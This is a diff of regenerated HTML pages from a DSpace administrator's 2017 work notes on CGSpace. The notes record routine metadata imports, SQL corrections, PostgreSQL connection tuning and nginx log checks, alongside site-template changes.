<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -100,7 +100,7 @@
<time datetime="2017-06-01T10:14:52+03:00">Thu Jun 01, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -133,7 +133,7 @@
<li>dc.format.extent: <code>value.replace(&quot;p. &quot;, &quot;&quot;).split(&quot;-&quot;)[1].toNumber() - value.replace(&quot;p. &quot;, &quot;&quot;).split(&quot;-&quot;)[0].toNumber()</code></li>
</ul>
</li>
<li>Finally, after some filtering to see which small outliers there were (based on dc.format.extent using &ldquo;p. 1-14&rdquo; vs &ldquo;29 p.&quot;), create a new column with last page number:
<li>Finally, after some filtering to see which small outliers there were (based on dc.format.extent using &ldquo;p. 1-14&rdquo; vs &ldquo;29 p.&rdquo;), create a new column with last page number:
<ul>
<li><code>cells[&quot;dc.page.from&quot;].value.toNumber() + cells[&quot;dc.format.pages&quot;].value.toNumber()</code></li>
</ul>
@ -153,7 +153,7 @@
<li>17 of the items have issues with incorrect page number ranges, and upon closer inspection they do not appear in the referenced PDF</li>
<li>I&rsquo;ve flagged them and proceeded without them (752 total) on DSpace Test:</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/93843 --source /home/aorth/src/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
</code></pre><ul>
<li>I went and did some basic sanity checks on the remaining items in the CIAT Book Chapters and decided they are mostly fine (except one duplicate and the flagged ones), so I imported them to DSpace Test too (162 items)</li>
<li>Total items in CIAT Book Chapters is 914, with the others being flagged for some reason, and we should send that back to CIAT</li>
@ -167,7 +167,7 @@
<li>Created a new branch with just the relevant changes, so I can send it to them</li>
<li>One thing I noticed is that there is a failed database migration related to CUA:</li>
</ul>
<pre><code>+----------------+----------------------------+---------------------+---------+
<pre tabindex="0"><code>+----------------+----------------------------+---------------------+---------+
| Version | Description | Installed on | State |
+----------------+----------------------------+---------------------+---------+
| 1.1 | Initial DSpace 1.1 databas | | PreInit |
@ -213,15 +213,15 @@
</li>
<li>Finally import 914 CIAT Book Chapters to CGSpace in two batches:</li>
</ul>
<pre><code>$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
$ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &amp;&gt; /tmp/ciat-books2.log
<pre tabindex="0"><code>$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books.map &amp;&gt; /tmp/ciat-books.log
$ JAVA_OPTS=&#34;-Xmx1024m -Dfile.encoding=UTF-8&#34; [dspace]/bin/dspace import --add --eperson=aorth@mjanja.ch --collection=10568/35701 --source /home/aorth/CIAT-Books/SimpleArchiveFormat/ --mapfile=/tmp/ciat-books2.map &amp;&gt; /tmp/ciat-books2.log
</code></pre><h2 id="2017-06-25">2017-06-25</h2>
<ul>
<li>WLE has said that one of their Phase II research themes is being renamed from <code>Regenerating Degraded Landscapes</code> to <code>Restoring Degraded Landscapes</code></li>
<li>Pull request with the changes to <code>input-forms.xml</code>: <a href="https://github.com/ilri/DSpace/pull/329">#329</a></li>
<li>As of now it doesn&rsquo;t look like there are any items using this research theme so we don&rsquo;t need to do any updates:</li>
</ul>
<pre><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like 'Regenerating Degraded Landscapes%';
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where resource_type_id=2 and metadata_field_id=237 and text_value like &#39;Regenerating Degraded Landscapes%&#39;;
text_value
------------
(0 rows)
@ -233,7 +233,7 @@ $ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace impo
<ul>
<li>CGSpace went down briefly, I see lots of these errors in the dspace logs:</li>
</ul>
<pre><code>Java stacktrace: java.util.NoSuchElementException: Timeout waiting for idle object
<pre tabindex="0"><code>Java stacktrace: java.util.NoSuchElementException: Timeout waiting for idle object
</code></pre><ul>
<li>After looking at the Tomcat logs, Munin graphs, and PostgreSQL connection stats, it seems there is just a high load</li>
<li>Might be a good time to adjust DSpace&rsquo;s database connection settings, like I first mentioned in April, 2017 after reading the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+April+2017">2017-04 DCAT comments</a></li>
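<li>The settings in question live in <code>dspace.cfg</code>; a minimal sketch of the pool-related properties we would be tuning (these numbers are placeholders, not recommendations):</li>
</ul>
<pre tabindex="0"><code>db.maxconnections = 50
db.maxwait = 10000
db.maxidle = 20
</code></pre>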
@ -270,15 +270,15 @@ $ JAVA_OPTS=&quot;-Xmx1024m -Dfile.encoding=UTF-8&quot; [dspace]/bin/dspace impo
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>


@ -36,7 +36,7 @@ Merge changes for WLE Phase II theme rename (#329)
Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace
We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the output into quasi XML:
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -66,12 +66,12 @@ We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -118,7 +118,7 @@ We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the
<time datetime="2017-07-01T18:03:52+03:00">Sat Jul 01, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -132,7 +132,7 @@ We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the
<li>Looking at extracting the metadata registries from ICARDA&rsquo;s MEL DSpace database so we can compare fields with CGSpace</li>
<li>We can use PostgreSQL&rsquo;s extended output format (<code>-x</code>) plus <code>sed</code> to format the output into quasi XML:</li>
</ul>
<pre><code>$ psql dspacenew -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::'
<pre tabindex="0"><code>$ psql dspacenew -x -c &#39;select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=5 order by element, qualifier;&#39; | sed -r &#39;s:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::&#39;
</code></pre><ul>
<li>The <code>sed</code> script is from a post on the <a href="https://www.postgresql.org/message-id/437E44A5.508%40ultimeth.com">PostgreSQL mailing list</a></li>
<li>Abenet says the ILRI board wants to be able to have &ldquo;lead author&rdquo; for every item, so I&rsquo;ve whipped up a WIP test in the <code>5_x-lead-author</code> branch</li>
@ -151,11 +151,11 @@ We can use PostgreSQL&rsquo;s extended output format (-x) plus sed to format the
<li>Adjust WLE Research Theme to include both Phase I and II on the submission form according to editor feedback (<a href="https://github.com/ilri/DSpace/pull/330">#330</a>)</li>
<li>Generate list of fields in the current CGSpace <code>cg</code> scheme so we can record them properly in the metadata registry:</li>
</ul>
<pre><code>$ psql dspace -x -c 'select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;' | sed -r 's:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::' &gt; cg-types.xml
<pre tabindex="0"><code>$ psql dspace -x -c &#39;select element, qualifier, scope_note from metadatafieldregistry where metadata_schema_id=2 order by element, qualifier;&#39; | sed -r &#39;s:^-\[ RECORD (.*) \]-+$:&lt;/dc-type&gt;\n&lt;dc-type&gt;\n&lt;schema&gt;cg&lt;/schema&gt;:;s:([^ ]*) +\| (.*): &lt;\1&gt;\2&lt;/\1&gt;:;s:^$:&lt;/dc-type&gt;:;1s:&lt;/dc-type&gt;\n::&#39; &gt; cg-types.xml
</code></pre><ul>
<li>CGSpace was unavailable briefly, and I saw this error in the DSpace log file:</li>
</ul>
<pre><code>2017-07-05 13:05:36,452 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
<pre tabindex="0"><code>2017-07-05 13:05:36,452 ERROR org.dspace.storage.rdbms.DatabaseManager @ SQL connection Error -
org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserved for non-replication superuser connections
</code></pre><ul>
<li>Looking at the <code>pg_stat_activity</code> table I saw there were indeed 98 active connections to PostgreSQL, and at this time the limit is 100, so that makes sense</li>
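<li>The quick checks for that boil down to something like (sketch):</li>
</ul>
<pre tabindex="0"><code>dspace=# select count(*) from pg_stat_activity;
dspace=# show max_connections;
</code></pre>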
@ -163,7 +163,7 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
<li>Abenet said she was generating a report with Atmire&rsquo;s CUA module, so it could be due to that?</li>
<li>Looking in the logs I see this random error again that I should report to DSpace:</li>
</ul>
<pre><code>2017-07-05 13:50:07,196 ERROR org.dspace.statistics.SolrLogger @ COUNTRY ERROR: EU
<pre tabindex="0"><code>2017-07-05 13:50:07,196 ERROR org.dspace.statistics.SolrLogger @ COUNTRY ERROR: EU
</code></pre><ul>
<li>Seems to come from <code>dspace-api/src/main/java/org/dspace/statistics/SolrLogger.java</code></li>
</ul>
@ -211,7 +211,7 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
<ul>
<li>Move two top-level communities to be sub-communities of ILRI Projects</li>
</ul>
<pre><code>$ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=&quot;$community&quot;; done
<pre tabindex="0"><code>$ for community in 10568/2347 10568/25209; do /home/cgspace.cgiar.org/bin/dspace community-filiator --set --parent=10568/27629 --child=&#34;$community&#34;; done
</code></pre><ul>
<li>Discuss CGIAR Library data cleanup with Sisay and Abenet</li>
</ul>
@ -241,16 +241,16 @@ org.postgresql.util.PSQLException: FATAL: remaining connection slots are reserve
<ul>
<li>Looks like the final list of metadata corrections for CCAFS project tags will be:</li>
</ul>
<pre><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-FP4_CRMWestAfrica';
update metadatavalue set text_value='FP3_VietnamLED' where resource_type_id=2 and metadata_field_id=134 and text_value='FP3_VeitnamLED';
update metadatavalue set text_value='PII-FP1_PIRCCA' where resource_type_id=2 and metadata_field_id=235 and text_value='PII-SEA_PIRCCA';
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value='PII-WA_IntegratedInterventions';
<pre tabindex="0"><code>delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-FP4_CRMWestAfrica&#39;;
update metadatavalue set text_value=&#39;FP3_VietnamLED&#39; where resource_type_id=2 and metadata_field_id=134 and text_value=&#39;FP3_VeitnamLED&#39;;
update metadatavalue set text_value=&#39;PII-FP1_PIRCCA&#39; where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-SEA_PIRCCA&#39;;
delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and text_value=&#39;PII-WA_IntegratedInterventions&#39;;
</code></pre><ul>
<li>Now just waiting to run them on CGSpace, and then apply the modified input forms after Macaroni Bros give me an updated list</li>
<li>Temporarily increase the nginx upload limit to 200MB for Sisay to upload the CIAT presentations (the directive involved is sketched further below)</li>
<li>Looking at the CGSpace activity page, there are 52 Baidu bots concurrently crawling our website (I copied the activity page to a text file and grepped it)!</li>
</ul>
<pre><code>$ grep 180.76. /tmp/status | awk '{print $5}' | sort | uniq | wc -l
<pre tabindex="0"><code>$ grep 180.76. /tmp/status | awk &#39;{print $5}&#39; | sort | uniq | wc -l
52
</code></pre><ul>
<li>From looking at the <code>dspace.log</code> I see they are all using the same session, which means our Crawler Session Manager Valve is working</li>
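<li>Regarding the upload limit change above, the nginx directive involved is basically just this, in the relevant server or location block (sketch):</li>
</ul>
<pre tabindex="0"><code>client_max_body_size 200m;
</code></pre>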
@ -275,15 +275,15 @@ delete from metadatavalue where resource_type_id=2 and metadata_field_id=235 and
<ol class="list-unstyled">
<li><a href="/cgspace-notes/2021-08/">August, 2021</a></li>
<li><a href="/cgspace-notes/2025-01/">January, 2025</a></li>
<li><a href="/cgspace-notes/2021-07/">July, 2021</a></li>
<li><a href="/cgspace-notes/2024-12/">December, 2024</a></li>
<li><a href="/cgspace-notes/2021-06/">June, 2021</a></li>
<li><a href="/cgspace-notes/2024-11/">November, 2024</a></li>
<li><a href="/cgspace-notes/2021-05/">May, 2021</a></li>
<li><a href="/cgspace-notes/2024-10/">October, 2024</a></li>
<li><a href="/cgspace-notes/2021-04/">April, 2021</a></li>
<li><a href="/cgspace-notes/2024-09/">September, 2024</a></li>
</ol>
</section>


@ -60,7 +60,7 @@ This was due to newline characters in the dc.description.abstract column, which
I exported a new CSV from the collection on DSpace Test and then manually removed the characters in vim using g/^$/d
Then I cleaned up the author authorities and HTML characters in OpenRefine and sent the file back to Abenet
"/>
<meta name="generator" content="Hugo 0.87.0" />
<meta name="generator" content="Hugo 0.133.1">
@ -90,12 +90,12 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<!-- combined, minified CSS -->
<link href="https://alanorth.github.io/cgspace-notes/css/style.beb8012edc08ba10be012f079d618dc243812267efe62e11f22fe49618f976a4.css" rel="stylesheet" integrity="sha256-vrgBLtwIuhC&#43;AS8HnWGNwkOBImfv5i4R8i/klhj5dqQ=" crossorigin="anonymous">
<link href="https://alanorth.github.io/cgspace-notes/css/style.c6ba80bc50669557645abe05f86b73cc5af84408ed20f1551a267bc19ece8228.css" rel="stylesheet" integrity="sha256-xrqAvFBmlVdkWr4F&#43;GtzzFr4RAjtIPFVGiZ7wZ7Ogig=" crossorigin="anonymous">
<!-- minified Font Awesome for SVG icons -->
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.ffbfea088a9a1666ec65c3a8cb4906e2a0e4f92dc70dbbf400a125ad2422123a.js" integrity="sha256-/7/qCIqaFmbsZcOoy0kG4qDk&#43;S3HDbv0AKElrSQiEjo=" crossorigin="anonymous"></script>
<script defer src="https://alanorth.github.io/cgspace-notes/js/fontawesome.min.f5072c55a0721857184db93a50561d7dc13975b4de2e19db7f81eb5f3fa57270.js" integrity="sha256-9QcsVaByGFcYTbk6UFYdfcE5dbTeLhnbf4HrXz&#43;lcnA=" crossorigin="anonymous"></script>
<!-- RSS 2.0 feed -->
@ -142,7 +142,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<time datetime="2017-08-01T11:51:52+03:00">Tue Aug 01, 2017</time>
in
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/cgspace-notes/tags/notes/" rel="tag">Notes</a>
<span class="fas fa-tag" aria-hidden="true"></span>&nbsp;<a href="/tags/notes/" rel="tag">Notes</a>
</p>
</header>
@ -215,7 +215,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<li>I need to get an author list from the database for only the CGIAR Library community to send to Peter</li>
<li>It turns out that I had already used this SQL query in <a href="/cgspace-notes/2017-05">May, 2017</a> to get the authors from CGIAR Library:</li>
</ul>
<pre><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = 'contributor' and qualifier = 'author') AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in ('10568/93761', '10947/1', '10947/10', '10947/11', '10947/12', '10947/13', '10947/14', '10947/15', '10947/16', '10947/17', '10947/18', '10947/19', '10947/2', '10947/20', '10947/21', '10947/22', '10947/23', '10947/24', '10947/25', '10947/2512', '10947/2515', '10947/2516', '10947/2517', '10947/2518', '10947/2519', '10947/2520', '10947/2521', '10947/2522', '10947/2523', '10947/2524', '10947/2525', '10947/2526', '10947/2527', '10947/2528', '10947/2529', '10947/2530', '10947/2531', '10947/2532', '10947/2533', '10947/2534', '10947/2535', '10947/2536', '10947/2537', '10947/2538', '10947/2539', '10947/2540', '10947/2541', '10947/2589', '10947/26', '10947/2631', '10947/27', '10947/2708', '10947/2776', '10947/2782', '10947/2784', '10947/2786', '10947/2790', '10947/28', '10947/2805', '10947/2836', '10947/2871', '10947/2878', '10947/29', '10947/2900', '10947/2919', '10947/3', '10947/30', '10947/31', '10947/32', '10947/33', '10947/34', '10947/3457', '10947/35', '10947/36', '10947/37', '10947/38', '10947/39', '10947/4', '10947/40', '10947/4052', '10947/4054', '10947/4056', '10947/4068', '10947/41', '10947/42', '10947/43', '10947/4368', '10947/44', '10947/4467', '10947/45', '10947/4508', '10947/4509', '10947/4510', '10947/4573', '10947/46', '10947/4635', '10947/4636', '10947/4637', '10947/4638', '10947/4639', '10947/4651', '10947/4657', '10947/47', '10947/48', '10947/49', '10947/5', '10947/50', '10947/51', '10947/5308', '10947/5322', '10947/5324', '10947/5326', '10947/6', '10947/7', '10947/8', '10947/9'))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
<pre tabindex="0"><code>dspace#= \copy (select distinct text_value, count(*) from metadatavalue where metadata_field_id = (select metadata_field_id from metadatafieldregistry where element = &#39;contributor&#39; and qualifier = &#39;author&#39;) AND resource_type_id = 2 AND resource_id IN (select item_id from collection2item where collection_id IN (select resource_id from handle where handle in (&#39;10568/93761&#39;, &#39;10947/1&#39;, &#39;10947/10&#39;, &#39;10947/11&#39;, &#39;10947/12&#39;, &#39;10947/13&#39;, &#39;10947/14&#39;, &#39;10947/15&#39;, &#39;10947/16&#39;, &#39;10947/17&#39;, &#39;10947/18&#39;, &#39;10947/19&#39;, &#39;10947/2&#39;, &#39;10947/20&#39;, &#39;10947/21&#39;, &#39;10947/22&#39;, &#39;10947/23&#39;, &#39;10947/24&#39;, &#39;10947/25&#39;, &#39;10947/2512&#39;, &#39;10947/2515&#39;, &#39;10947/2516&#39;, &#39;10947/2517&#39;, &#39;10947/2518&#39;, &#39;10947/2519&#39;, &#39;10947/2520&#39;, &#39;10947/2521&#39;, &#39;10947/2522&#39;, &#39;10947/2523&#39;, &#39;10947/2524&#39;, &#39;10947/2525&#39;, &#39;10947/2526&#39;, &#39;10947/2527&#39;, &#39;10947/2528&#39;, &#39;10947/2529&#39;, &#39;10947/2530&#39;, &#39;10947/2531&#39;, &#39;10947/2532&#39;, &#39;10947/2533&#39;, &#39;10947/2534&#39;, &#39;10947/2535&#39;, &#39;10947/2536&#39;, &#39;10947/2537&#39;, &#39;10947/2538&#39;, &#39;10947/2539&#39;, &#39;10947/2540&#39;, &#39;10947/2541&#39;, &#39;10947/2589&#39;, &#39;10947/26&#39;, &#39;10947/2631&#39;, &#39;10947/27&#39;, &#39;10947/2708&#39;, &#39;10947/2776&#39;, &#39;10947/2782&#39;, &#39;10947/2784&#39;, &#39;10947/2786&#39;, &#39;10947/2790&#39;, &#39;10947/28&#39;, &#39;10947/2805&#39;, &#39;10947/2836&#39;, &#39;10947/2871&#39;, &#39;10947/2878&#39;, &#39;10947/29&#39;, &#39;10947/2900&#39;, &#39;10947/2919&#39;, &#39;10947/3&#39;, &#39;10947/30&#39;, &#39;10947/31&#39;, &#39;10947/32&#39;, &#39;10947/33&#39;, &#39;10947/34&#39;, &#39;10947/3457&#39;, &#39;10947/35&#39;, &#39;10947/36&#39;, &#39;10947/37&#39;, &#39;10947/38&#39;, &#39;10947/39&#39;, &#39;10947/4&#39;, &#39;10947/40&#39;, &#39;10947/4052&#39;, &#39;10947/4054&#39;, &#39;10947/4056&#39;, &#39;10947/4068&#39;, &#39;10947/41&#39;, &#39;10947/42&#39;, &#39;10947/43&#39;, &#39;10947/4368&#39;, &#39;10947/44&#39;, &#39;10947/4467&#39;, &#39;10947/45&#39;, &#39;10947/4508&#39;, &#39;10947/4509&#39;, &#39;10947/4510&#39;, &#39;10947/4573&#39;, &#39;10947/46&#39;, &#39;10947/4635&#39;, &#39;10947/4636&#39;, &#39;10947/4637&#39;, &#39;10947/4638&#39;, &#39;10947/4639&#39;, &#39;10947/4651&#39;, &#39;10947/4657&#39;, &#39;10947/47&#39;, &#39;10947/48&#39;, &#39;10947/49&#39;, &#39;10947/5&#39;, &#39;10947/50&#39;, &#39;10947/51&#39;, &#39;10947/5308&#39;, &#39;10947/5322&#39;, &#39;10947/5324&#39;, &#39;10947/5326&#39;, &#39;10947/6&#39;, &#39;10947/7&#39;, &#39;10947/8&#39;, &#39;10947/9&#39;))) group by text_value order by count desc) to /tmp/cgiar-library-authors.csv with csv;
</code></pre><ul>
<li>Meeting with Peter and CGSpace team
<ul>
@ -242,7 +242,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<li>I sent a message to the mailing list about the duplicate content issue with <code>/rest</code> and <code>/bitstream</code> URLs</li>
<li>Looking at the logs for the REST API on <code>/rest</code>, it looks like someone is hammering it, doing testing or something&hellip;</li>
</ul>
<pre><code># awk '{print $1}' /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
<pre tabindex="0"><code># awk &#39;{print $1}&#39; /var/log/nginx/rest.log.1 | sort -n | uniq -c | sort -h | tail -n 5
140 66.249.66.91
404 66.249.66.90
1479 50.116.102.77
@ -252,7 +252,7 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<li>The top offender is 70.32.83.92 which is actually the same IP as ccafs.cgiar.org, so I will email the Macaroni Bros to see if they can test on DSpace Test instead</li>
<li>I&rsquo;ve enabled logging of <code>/oai</code> requests on nginx as well so we can potentially determine bad actors here (also to see if anyone is actually using OAI!)</li>
</ul>
<pre><code> # log oai requests
<pre tabindex="0"><code> # log oai requests
location /oai {
access_log /var/log/nginx/oai.log;
proxy_pass http://tomcat_http;
@ -266,20 +266,20 @@ Then I cleaned up the author authorities and HTML characters in OpenRefine and s
<ul>
<li>Run author corrections on CGIAR Library community from Peter</li>
</ul>
<pre><code>$ ./fix-metadata-values.py -i /tmp/authors-fix-523.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p fuuuu
<pre tabindex="0"><code>$ ./fix-metadata-values.py -i /tmp/authors-fix-523.csv -f dc.contributor.author -t correct -m 3 -d dspace -u dspace -p fuuuu
</code></pre><ul>
<li>There were only three deletions so I just did them manually:</li>
</ul>
<pre><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='C';
<pre tabindex="0"><code>dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;C&#39;;
DELETE 1
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value='WSSD';
dspace=# delete from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value=&#39;WSSD&#39;;
</code></pre><ul>
<li>Generate a new list of authors from the CGIAR Library community for Peter to look through now that the initial corrections have been done</li>
<li>Thinking about resource limits for PostgreSQL again after last week&rsquo;s CGSpace crash and related to a recent discussion I had in the comments of the <a href="https://wiki.lyrasis.org/display/cmtygp/DCAT+Meeting+April+2017">April, 2017 DCAT meeting notes</a></li>
<li>In that thread Chris Wilper suggests a new default of 35 max connections for <code>db.maxconnections</code> (from the current default of 30), knowing that <em>each DSpace web application</em> gets to use up to this many on its own</li>
<li>It would be good to approximate what the theoretical maximum number of connections on a busy server would be, perhaps by looking to see which apps use SQL:</li>
</ul>
<pre><code>$ grep -rsI SQLException dspace-jspui | wc -l
<pre tabindex="0"><code>$ grep -rsI SQLException dspace-jspui | wc -l
473
$ grep -rsI SQLException dspace-oai | wc -l
63
@ -320,37 +320,37 @@ $ grep -rsI SQLException dspace-xmlui | wc -l
<ul>
<li>I wanted to merge the various field variations like <code>cg.subject.system</code> and <code>cg.subject.system[en_US]</code> in OpenRefine but I realized it would be easier in PostgreSQL:</li>
</ul>
<pre><code>dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=254;
<pre tabindex="0"><code>dspace=# select distinct text_value, text_lang from metadatavalue where resource_type_id=2 and metadata_field_id=254;
</code></pre><ul>
<li>And actually, we can do it for other generic fields for items in those collections, for example <code>dc.description.abstract</code>:</li>
</ul>
